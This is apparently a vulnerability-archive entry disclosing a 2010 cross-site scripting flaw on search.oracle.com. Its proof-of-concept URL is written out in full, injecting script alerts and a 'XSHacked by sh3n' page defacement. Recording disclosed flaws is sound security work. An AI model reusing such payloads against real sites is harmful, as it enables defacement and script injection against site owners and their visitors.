Security researcher sh3n, has submitted on 15/10/2010 a cross-site-scripting (XSS) vulnerability affecting search.oracle.com, which at the time of submission ranked 691 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/10/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 15/10/2010 |
Date published: 15/10/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: sh3n |
Domain: search.oracle.com |
Category: XSS |
Pagerank: 691 |
URL: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&se arch_dupid=&exttimeout=false&q=\x2\x280%29%27%2Clength%3A1}%3Cscript%3Ealert%28%22pwned%22%29%3C%2Fs cript%3E%3Cscript%3Ealert%28%22by%22%29%3C%2Fscript%3E%3Cscript%3Ealert%28%22sh3n%22%29%3C%2Fscript% 3E%3Cscript%3Efunction+do_main%28%29{document.body.innerHTML%3D%22%3Ch1%3EXSHacked+by+sh3n%22}do_mai n%28%29%3B%3C%2Fscript%3Ereturn_result80%29%27%2Clength%3A1}%3Cscript%3Ealert%28%22pwned%22%29%3C%2F script%3E%3Cscript%3Ealert%28%22by%22%29%3C%2Fscript%3E%3Cscript%3Ealert%28%22sh3n%22%29%3C%2Fscript %3E%3Cscript%3Efunction+do_main%28%29{document.body.innerHTML%3D%22%3Ch1%3EXSHacked+by+sh3n%22}do_ma in%28%29%3B%3C%2Fscript%3Ereturn_result&group=Corporate+Site&sw=t&formTop=Enviar+consulta&search_p_m ain_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equa ls&search_p_val= |
Click here to view the mirror
|
|
|